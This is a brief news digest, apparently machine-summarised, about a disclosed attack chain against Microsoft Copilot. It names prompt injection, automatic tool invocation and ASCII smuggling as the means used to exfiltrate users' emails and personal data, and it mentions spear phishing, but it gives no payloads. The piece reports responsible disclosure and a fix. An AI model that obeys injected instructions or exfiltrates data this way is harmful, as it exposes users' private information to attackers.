From Copilot to Copirate: How data thieves could hijack Microsoft’s chatbot

From Copilot to Copirate: How data thieves could hijack Microsoft's chatbot

August 28, 2024 at 09:08AM

Microsoft fixed flaws in Copilot that allowed attackers to steal users’ emails and personal data through a series of LLM-specific attacks, including prompt injection. Red teamer Johann Rehberger disclosed the exploit, prompting Microsoft to make changes for customer protection. The exploit used prompt injection, automatic tool invocation, and ASCII smuggling to exfiltrate data. This highlights ongoing challenges in protecting LLMs.

The meeting notes provide an overview of a series of attacks on Microsoft’s Copilot, which led to data exfiltration, prompting a fix from Microsoft. The attacks included prompt injection, phishing emails, and using specific inputs to manipulate Copilot. Additionally, there were discussions on potential malicious uses of Copilot, including spear phishing and accessing sensitive data without leaving a trace. This highlights the importance of safeguarding language model systems against evolving attack techniques to ensure data privacy and security.

Full Article